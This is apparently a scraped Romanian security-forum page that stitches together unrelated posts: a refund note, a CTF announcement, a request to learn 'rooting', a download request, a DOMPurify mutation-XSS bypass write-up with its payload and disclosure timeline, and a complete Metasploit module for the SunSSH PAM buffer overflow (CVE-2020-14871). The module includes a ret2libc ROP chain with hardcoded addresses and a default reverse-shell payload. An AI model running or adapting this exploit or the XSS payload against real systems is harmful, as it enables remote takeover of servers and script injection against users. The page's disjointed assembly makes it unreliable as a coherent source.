Leaderboard

Am primit banii inapoi. Dupa 17 zile , mai bine mai tarziu decat niciodata. Se poate inchide, multumesc.

For those who are only interested in the final payload here you go (I won’t judge). For the ones interested in why it works, please bear with me. <form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>"> First of all, I would like to point out that this article and the bypass described here are heavily based on Michał Bentkowski (@SecurityMB) research. The original article and previous bypass who made it possible for me to find this new vector are available here. The article also contains all of the required foundations the reader may need to properly understand how and why the bypass described here works. It took me a few rounds of reading and playing with the LiveDOM++ tool, also provided by @SecurityMB, to really understand why Michał’s original bypass worked in the first place. Gareth Heyes (@garethheyes) also built upon Michał’s work and found a variation of the original bypass days after it got published. I also took my time with Gareth’s bypass to properly understand what was going on. What is DOMPurify? DOMPurify is a widely used HTML sanitizer library. It is mainly used to sanitize user input on web applications that permits the creation of HTML/Rich Text content. Think of a web-mail client or blog platform for example. A common usage pattern for DOMPurify is the following: let div = document.createElement('div'); const html='<some></non sanitized=1></html>'; const sanitized = DOMPurify.sanitize(html); div.innerHTML = sanitized; DOMPurifyUsageSample.js According to Michał’s article: The important takeaway is that the HTML markup is parsed twice and serialized into a string in between. Namespaces, and why they are important HTML is a markup language based on XML. XML utilizes the concept of namespaces. An HTML document, compliant with the current specification of HTML 5, may contain elements from three different namespaces. HTML (http://www.w3.org/1999/xhtml) SVG (http://www.w3.org/2000/svg) MathML (http://www.w3.org/1998/Math/MathML) Namespaces solve the ambiguity problem when a single XML document contains homograph elements and/or properties from different “vocabularies”. For example, all the previously listed specifications contain a tag named style. The style tag has different properties and rendering behaviors associated with it depending on the namespace it's used. This means that a browser will behave differently when it parses a style tag depending on its ancestors (Figure 1, Figure 2). Figure 2: style tag in the SVG namespace DOM mutation in a nutshell Although it may sound counter-intuitive, parsing and serializing a DOM fragment is not an idempotent operation. This means that in some cases, depending on how the fragment is constructed, the serialized version of a DOM tree won’t result in the same DOM tree when parsed. This double-parsing behavior is inherent to DOMPurify’s standard usage. However, some unexpected results from double-parsing DOM fragments are not unexpected at all, as they are documented in HTML’s current specification. One of these cases regards nested forms. A DOM fragment with nested form tags is not to be considered a valid construction according to HTML’s current specification. However, the following HTML fragment when parsed once will result in a DOM tree with nested forms. <form id="outer"> <div> </form> <form id="inner"> <input> Snippet 2: nested form mutation gadget nfgadget.html We can use the LiveDOM++ tool to inspect how the DOM behaves, before and after being sanitized with DOMPurify, when it is fed with the HTML fragment mentioned above. Figure 3: nested forms parsed twice As demonstrated, when parsed for the first time, the HTML fragment results in a non-compliant DOM tree containing nested form tags. After sanitizing it, DOMPurify will serialize the DOM tree and the resulting string will be parsed again by the browser. It is then possible to verify that the direct parenthood of the input tag is transferred the inner form tag to the outer form tag in the final fragment. We will refer to the type of HTML markup that results in a mutation that changes the direct parent of a tag as an ownership mutation gadget. The table tag can also be used to construct an ownership mutation gadget as shown below. Figure 4: table ownership mutation gadget In the example above the direct parent of the inner anchor tag is changed from the outer anchor to the div tag. Understanding how these gadgets behave is crucial to understanding the bypass construction. I recommend experimenting with the gadgets on LiveDOM++ to get a better understanding of how the gadgets behave. Foreign content By default, all elements in an HTML document must be parsed by a browser according to the rules defined by the HTML namespace; however, if the parser encounters a <svg> or <math> tag, it should then parse those elements and their descendants according to the SVG and MathML namespaces respectively. One also needs to consider that both the MathML and SVG namespaces support foreign content as well, meaning a chain of namespaces transitions can be built as shown below. Figure 5: html->svg->math->html transition chain Namespace confusion, putting it all together As mentioned before, homograph elements like the style tag have different properties and rendering rules depending on the namespace they are in. This means that if we use an ownership mutation gadget to change the direct parent of a homograph tag and cause its namespace to change, we can trick the sanitizer into producing a malicious serialized HTML fragment. That is exactly what Michał did. Michal’s original bypass used an ownership mutation gadget to change the direct parent of a mglyph tag from a form element in the HTML namespace to a mtext tag in the MathML namespace. This mutation results in the descendants of the mglyph element becoming members of the MathML namespace in the final DOM tree while existing in the HTML namespace in the tree sanitized by DOMPurify. At the time of this writing, it is still possible to use the update parser feature of the LiveDOM++ tool to reproduce the original bypass using a vulnerable version of DOMPurify. Figure 6: update parser feature Figure 7: original mXSS bypass The details of why and how this works can be referenced in Michał’s original article. Understanding the original bypass is important because it provides the foundation for the variation described in this article. Building the final payload Now that I described the building blocks of a potential bypass I will describe the methodology I used to build my bypass. I began by pondering the following: The picture below illustrates the basic structure of the bypass. Using a nested form ownership mutation gadget it is possible to change the mglyph tag parent to mtext; that places the descendants of the mglyph tag to be in the MathML namespace in the final DOM tree. Nothing new so far. The difference is that instead of using it to go from HTML to MathML, we are using it to go from SVG to MathML. HTML→MathML→HTML→SVG to HTML→MathML to be precise. Figure 8: from SVG to MathML At this point, I knew I was on to something but it took me a while to build a working payload. The whole point was figuring out a chain of tags that were safe in the SVG namespace and that contained an XSS payload when transferred to the MathML namespace. This is what I came up with: <mtext> <style> <path id="</style><img onerror=alert(1') src>"> Snippet 2: bypass fragment svggadget.html In the SVG namespace, mtext will be handled as an unknown tag. The style tag descendants will be rendered as opposed to its homograph in the HTML namespace, and the id attribute of the SVG path tag is nothing more than a safe, free-form text identifier. What happens when this snippet is parsed in the MathML namespace though? Here is the result: Figure 9: bypass fragment in the MathML namespace First of all, mtext is handled as a MathML text integration point. This means its descendants will be in the HTML namespace, according to MathML’s current specification. Once in the HTML namespace, style behaves differently and treats everything until its closing tag as raw text. Finally, the malicious img tag is parsed followed by a harmless piece of raw text that reads “>. The following snapshot depicts the DOM tree state before being sanitized by DOMPurify. Figure 10: final payload DOM tree before sanitization This next snapshot shows the DOM tree produced by parsing DOMPurify’s output. Figure 11: final payload DOM tree after sanitization Disclosure timeline I notified cure53 on 11/02/2020 around 13:30 (GMT-6). A fix was made available and tested at 13:41 (GMT-6). The fix was officially published in version 2.2.2 sometime later on the very same day. Acknowledgments I want to thank Michał Bentkowski and Gareth Heyes for their incredible work and constant contributions to the security community. Dr.-Ing. Mario Heiderich (@Cure53) for acting so fast and for being a gentleman despite having to stay up late to work on the fix. Lastly, @LiveOverFlow for reminding me in one of his videos that we need to move away from the basics as soon as we master them and constantly challenge ourselves. Source: https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878f

This Metasploit module exploits a stack-based buffer overflow in the Solaris PAM library's username parsing code, as used by the SunSSH daemon when the keyboard-interactive authentication method is specified. Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox, VMware Fusion, and VMware Player. Bare metal untested. Your addresses may vary. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::CheckModule include Msf::Exploit::Remote::SSH def initialize(info = {}) super( update_info( info, 'Name' => 'Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in the Solaris PAM library's username parsing code, as used by the SunSSH daemon when the keyboard-interactive authentication method is specified. Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox, VMware Fusion, and VMware Player. Bare metal untested. Your addresses may vary. }, 'Author' => [ 'Jacob Thompson', # Analysis 'Aaron Carreras', # Analysis 'Jeffrey Martin', # Testing 'Hacker Fantastic', # PoC 'wvu' # Exploit ], 'References' => [ ['CVE', '2020-14871'], ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html'], ['URL', 'https://hacker.house/lab/cve-2020-18471/'], ['URL', 'https://twitter.com/hackerfantastic/status/1323431512822435841'] ], 'DisclosureDate' => '2020-10-20', # Vendor advisory 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { # https://github.com/illumos/illumos-gate/blob/edd669a7ce20a2f7406e8f00489c426c0690f1bd/usr/src/lib/libpam/pam_framework.c#L615-L617 'BadChars' => "\x00\x09\x20", 'Encoder' => 'cmd/perl' }, 'Targets' => [ [ 'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware', { 'Ident' => 'SSH-2.0-Sun_SSH_1.1.5', 'LibcBase' => 0xfeb90000 } ], [ 'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox', { 'Ident' => 'SSH-2.0-Sun_SSH_1.1.5', 'LibcBase' => 0xfeb80000 } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl', 'SSH_TIMEOUT' => 2, 'CheckModule' => 'auxiliary/scanner/ssh/ssh_version' }, 'Notes' => { 'Stability' => [CRASH_SERVICE_RESTARTS], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ACCOUNT_LOCKOUTS, IOC_IN_LOGS] } ) ) end def check # Run auxiliary/scanner/ssh/ssh_version checkcode = super return checkcode unless checkcode == CheckCode::Detected unless target['Ident'] == checkcode.details[:ident] return CheckCode::Safe("#{target.name} is an incompatible target.") end CheckCode::Appears("#{target.name} is a compatible target.") end def exploit print_status("Exploiting #{target.name}") ssh_client_opts = ssh_client_defaults.merge( port: rport, auth_methods: ['keyboard-interactive'], password: ret2libc, # HACK: This is really the username prompt on Solaris timeout: datastore['SSH_TIMEOUT'] ) ssh_client_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] print_status("Yeeting #{datastore['PAYLOAD']} at #{peer}") # Empty initial username Net::SSH.start(rhost, '', ssh_client_opts) rescue Net::SSH::AuthenticationFailed print_error(CheckCode::Safe.message) rescue Net::SSH::Disconnect print_warning('Disconnected, target selection may be incorrect!') rescue Net::SSH::ConnectionTimeout # Do nothing on success end # XXX: No ASLR, but libc base changes... def ret2libc buf = rand_text(516) buf << p32(target['LibcBase'] + 0x23904) # add esp, 8; ret buf << rand_text(4) buf << p32(0x08040101) # ecx buf << p32(0x0805ba07) # pop ecx; pop edx; pop ebp; ret buf << p32(target['LibcBase'] + 0x256d0) # exit(3) buf << p32(target['LibcBase'] + 0x91edf) # system(3) buf << rand_text(4) buf << p32(target['LibcBase'] + 0xae3f1) # push esp; and al, 0; push ecx; push edx; ret buf << payload.encoded end def p32(addr) [addr].pack('V') end end Source

Ma poate invata cineva cum sa fac un root de la 0?

20 noiembrie 2020 10:00 - 18:00 Premiile pentru concurs: Locul I - 3000 RON Locul II - 2000 RON Locul III - 1000 RON Cel mai bun write-up - 500 RON Premiile sunt oferite din donații de la membrii comunității: Nytro, malsploit, Dragos, dancezar, Matasareanu. Trecem printr-o perioadă grea și sugestia noastră este ca premiile să fie donate, dacă acest lucru este posibil. Pentru discuții referitoare la CTF vom folosi canalul #ctf de pe Slack. Prezentarea rezultatelor concursului va avea loc la ora 18:00. Detalii complete: https://ctf.rstcon.com/

There is no working download link and this seems like a real good piece of software to have. Can someone be so kind and post a working download link (and username/password if required). Thanks so much in advance.